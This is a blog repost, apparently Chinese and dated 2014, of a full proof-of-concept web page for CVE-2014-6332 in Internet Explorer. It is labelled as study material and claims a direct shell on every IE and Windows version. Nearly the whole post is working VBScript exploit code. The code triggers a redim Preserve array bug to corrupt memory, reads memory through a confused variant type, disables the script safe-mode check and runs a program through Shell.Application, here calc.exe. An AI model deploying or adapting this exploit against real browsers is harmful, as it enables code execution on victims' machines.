CVE-2014-6332 alliedve.htm @ 11/12/2014

学习类
from: http://hi.baidu.com/yuange1975/item/c846a94d76fe00a861d7b900

经验证,任何版本IE,任何版本windows系统,直接shell。
//*
  allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
  https://twitter.com/yuange75
  http://hi.baidu.com/yuange1975
*//
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
  On Error Resume Next
  set shell=createobject("Shell.Application")
  shell.ShellExecute "calc.exe"
end function
</script>

<SCRIPT LANGUAGE="VBScript">
dim  aa()
dim  ab()
dim  a0
dim  a1
dim  a2
dim  a3
dim  win9x
dim  intVersion
dim  rnda
dim  funclass
dim  myarray
Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0)  then
    exit  function
  end if
  if (instr(info,"MSIE")>0)  then
    intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
    exit  function
  end if
  win9x=0
  BeginInit()
  if Create()=True then
    myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
    else
      setnotsafemode()
    end if
  end if
end function

function BeginInit()
  Randomize()
  redim aa(5)
  redim ab(5)
  a0=13+17*rnd(6)
  a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
  if Over()=True then
    '  document.write(i)
    Create=True
    Exit For
  end if
  Next
end function

sub testaa()
end sub

function mydata()
  On Error Resume Next
  i=testaa
  i=null
  redim  Preserve aa(a2)
  ab(0)=0
  aa(a1)=i
  ab(0)=6.36598737437801E-314
  aa(a1+2)=myarray
  ab(2)=1.74088534731324E-310
  mydata=aa(a1)
  redim  Preserve aa(a0)
end function

function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)
  for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
      j=0
      redim  Preserve aa(a2)
      aa(a1+2)(i+&h11c+k)=ab(4)
      redim  Preserve aa(a0)
      j=0
      j=readmemo(i+&h120+k)
      Exit for
    end if
  next
  ab(2)=1.69759663316747E-313
  runmumaa()
end function

function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000
  redim  Preserve aa(a0)
  redim  ab(a0)
  redim  Preserve aa(a2)
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  if(IsObject(aa(a1-1)) = False) then
    if(intVersion<4) then
      mem=cint(a0+1)*16
      j=vartype(aa(a1-1))
      if((j=mem+4) or (j*8=mem+8)) then
        if(vartype(aa(a1-1))<>0)  then
          if(IsObject(aa(a1)) = False ) then
            type1=VarType(aa(a1))
          end if
        end if
      else
        redim  Preserve aa(a0)
        exit  function
      end if
    else
      if(vartype(aa(a1-1))<>0)  then
        if(IsObject(aa(a1)) = False ) then
          type1=VarType(aa(a1))
        end if
      end if
    end if
  end if
  if(type1=&h2f66) then
    Over=True
  end if
  if(type1=&hB9AD) then
    Over=True
    win9x=1
  end if
  redim  Preserve aa(a0)
end function

function ReadMemo(add)
  On Error Resume Next
  redim  Preserve aa(a2)
  ab(0)=0
  aa(a1)=add+4
  ab(0)=1.69759663316747E-313
  ReadMemo=lenb(aa(a1))
  ab(0)=0
  redim  Preserve aa(a0)
end function
</script>
</body>
</html>
发布于 11/12/2014 17:41:33 | 评论:0

看帖要回帖...

categories
archives
links
statistics
  • 网志数:1140
  • 评论数:2011